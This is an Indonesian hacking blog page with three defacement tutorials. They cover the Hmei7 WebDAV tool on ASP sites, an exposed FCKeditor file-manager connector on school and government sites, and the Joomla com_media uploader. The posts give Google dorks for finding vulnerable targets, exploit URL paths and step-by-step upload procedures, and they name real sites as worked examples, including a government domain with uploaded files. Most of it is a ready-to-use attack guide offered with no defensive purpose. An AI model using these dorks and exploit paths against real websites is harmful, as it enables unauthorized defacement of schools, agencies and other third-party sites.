Monday, February 20, 2017

cara deface menggunakan webdav buatan hmei7

Hallo Guys ^_^ bertemu lagi dengan saya Mr.Black Finder kali ini saya akan memberikan tutorial deface dengan WebdavMungkin tutorial ini sudah banyak yang tau dan sudah dipraktekkan. Namun saya juga sering menjumpai para member yang bertanya-tanya, cara mencari target webdav. Karena mungkin puluhan website sudah dia coba namun hasilnya 0 semua. Hehe, iya lah wong webdav itu Cuma untuk web yang berbasis asp. Apa itu asp? Intinya ya sejenis html, php, dll. Cari aja di google ada koq. Tapi ada juga lho yang gak bisa nggunain tool webdav ini, sebenernya gampang koq, Cuma yang sulit dibagian nyari targetnya doang :p
Oke langsung aja, pertama download dulu webdavnya disini [ jika sudah download matikan antivirus terlebih dahulu ]

Untuk mencari web yang vuln webdav bisa pakai dork dibawah ini:

inurl:Hmei7.asp;.txt
inurl:Umer.asp;.txt
intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache”
intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache” site:edu
intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache” site:gov
intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
inurl:webdav
inurl:.com.x/*.asp
inurl:.edu.x/*.asp
inurl:.gov.x/*.asp
inurl:.net.x/*.asp
inurl:.org.x/*.asp
Ganti tulisan x dengan domain negara ( contoh inurl:org.co.il/*.asp ).
Download dulu tool webdav disini [url].
Caranya, copy salah satu dork diatas. Sekarang pergi ke www.google.com dan paste dork tadi ke kotak pencarian seperti gambar dibawah ini.
                                                               
Sekarang buka tool webdav. Jangan lupa matikan antivirus dulu sebelum buka webdav. Ini adalah tampilan webdav. Keren kan, ada gambarnya Patrick. Wwkwkwk :v
Pertama klik WebDav pada menubar, kemudian klik Asp shell maker
.

Tunggu sampai muncul jendela baru seperti dibawah ini, kemudian klik menu Setting.

Nanti muncul form untuk mengatur nama file dan script seperti dibawah ini, klik Load Shell from file

Sekarang cari script deface agan yang udah disiapkan. Filenya boleh dalam bentuk .html atau .txt, setelah itu klik open.

Lihat scriptnya udah berubah kan. Sekarang edit nama filenya pada menu Name of your shell. Disini saya kasih contoh namanya isc.html dan kalo udah diganti, tekan tombol Hide me.


Nah senjata udah siap dipakai sekarang masukkan targetnya. Xixixi, kaya udah mau tempur aja :v
Targetnya diisi sesuai hasil pencarian dork di google tadi. Caranya klik tombol Add Site.


Masukkan url target kemudian klik OK.

Sekarang klik Serang !!! (jangan lupa baca doa biar berhasil. Ckckck :D)


Klik OK aja.

Nanti kalo berhasil, ada tulisan seperti gambar dibawah ini.


Copy url diatas ( http://www.e-ctasia.com/isc.html ) kemudian paste di address bar dan tekan enter.

Oke ^_^ sekian dulu tutorial dari saya :) semoga bermanfaat :)

#Mr.Black Finder
Posted by at 1 comment:

cara deface website sekolah (sch.id)

Hallo guys, Berjumpa Lagi Dengan Saya Mr.Black Finder Kali Ini Gwe Akan Share Cara Deface Website Sekolah (sch.id). Tutorial Ini Gwe Copas Dari Blog ONOFILE :v
Oke Langsung Aja :v
Pertama-tama Anda Siapkan File Deface Kalain
Berupa  .txt  / .jpg / .gif /.png , Yang Akan Di Upload Nantinya,... 
Nah Kalau Sudah Anda Siapkan,..
Langsung Saja Pilih Salah Satu Dork
Dan Copy Salah Satu Dork Di Bawah ini,...

Dork: 
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

Dan Saya Akan Memberi Contoh Pada Kalian,..
Nah  Sekarang Saya Akan Memilih Salah Satu Dork Di Atas,
Dan Kali ini Saya Memilih Dork Yang inurl:/html/guru.php?
Dan Saya Akan Paste Pada Halaman Googel Seperti Gambar berikut ini
Kalau Dork Sudah Anda Paste Lalu Klick Enter / Seperti Petunjuk Pada Gambar Tersebut
Dan Akan Keluar Banyak website Seperti Gambar Di Bawah ini
Lalu Anda pilih Salah Satu Website,..
Oke,.. Apakah Anda Sudah Paham,..??
Kalau Sudah Saya Akan Melanjutkan Salah Satu Contoh Tadi

Setelah Anda Memilih Salah Satu Website,..
Lalu Rubah Tampilanya Kita Exploit  Dengan menambahkan
/editor/filemanager/connectors/test.html  Pada belakang Site tersebut,..
Oke Saya Lanjut Contohnya,...
Setelah Saya Memilih Salah Satu Website,..
Dan Saya Memilih Website ini Sebagai Contohnya,...
Saya Memilih website Yang Saya temukan tadi Go.id  
http://www.tanjabbarkab.go.id/html/guru.php?id=profil&kode=53&profil=Pantun%20Daerah
Dan perhatikan Gambar tersebut
Lalu Saya Akan Exploit Seperti Contoh Gambar Berikut ini

Bila Anda Masih Bingung Sedikit Singkat
Langsung Saja 
http://www.tanjabbarkab.go.id/html/guru.php?id=profil&kode=53&profil=Pantun%20Daerah
Anda Rubah yang Warna Hijau ini
 /html/guru.php?id=profil&kode=53&profil=Pantun%20Daerah
Hingga Menjadi Seperti ini 
http://www.tanjabbarkab.go.id/editor/filemanager/connectors/test.html

Dan Akan Keluar Seperti Contoh Gambar Berikut ini


Setelah Anda Exploit Dan Menjumpai Tampilan Seperti Pada Gambar tersebut
Langkah yang Anda Lakukan Selanjutnya Hanya Merubah
Pada Kolom Connector *ASP Ubah Menjadi *PHP 
Terus Kolom Resource Type Ubah Jadi *FILE




Perhatikan Gambar ini


Jika Sudah Langsung Saja Klik Browse
Pilih File Yang Sudah Anda Siapakan Tadi Sejak Awal
Kalau Sudah Anda Pilih Filenya Lalu Upload
 


Setelah File Terupload,...
Sekarang Kita Cari File Kita,...
Dengan Menambahkan /userfiles/namafileanda.txt
Dibelakang Site / Website Tadi
Sebagai Hasil Dari Contoh Tadi
Inilah Hasilnya,... 
http://www.tanjabbarkab.go.id/userfiles/file/HsH.txt






Dan Anda Juga Bisa Upload Tipe Gambar
Kalau Gambar,.. Langkahnya,..
Rubah Kolom Resource Type  *FILE  Ubah Jadi *Image
Perhatikan Gambar ini




Kalau File Gambar Sudah Terupload
Sekarang Kita Cari File Kita,...
Dengan Menambahkan/userfiles/image/namafileanda.jpg
Dibelakang Site / Website Tadi
Sebagai Hasil Dari Contoh Tadi
Inilah Hasilnya,..http://www.tanjabbarkab.go.id/userfiles/image/HsH.jpg

Oke ^_^ Sekian Dulu Tutorial Dari Saya Dan Semoga berjumpa Lagi Dengan Saya Di Artikel Berikutnya :)

#Mr.Black Finder
Posted by at No comments:

cara deface metode Com_Media

Hallo guys, ketemu lagi dengan gwe Mr.Black Finder. Kali ini gwe akan Share tentang Deface metode Com_Media 
Langsung saja :v
Bahannya :
Dork : inurl:com_media site:com ( domain com bisa diganti dengan net, org dll)
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Pertama Kamu Cari targetnya dulu dan kalo bisa Dork diatas bisa dikembangkan lagi biar dapat web yang Masih Fresh

Lalu pilih web target Kamu.
Nah, sekarang kita  tambahin aja Exploitnya, Jadinya gini

target.co.li/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
maka akan terlihat seperti gambar berikut:

 Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
NOTE : File yang bisa Diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
 Lalu Klik tombol yang berfungsi utk Upload file deh
Cara Mengakses nya
target.co.li/images/namafilemu.txt
Sekian dulu tutorial dari saya. Semoga bermanfaat untuk kalian semua :)

 #Mr.Black Finder
Posted by at 1 comment:
Subscribe to: Posts (Atom)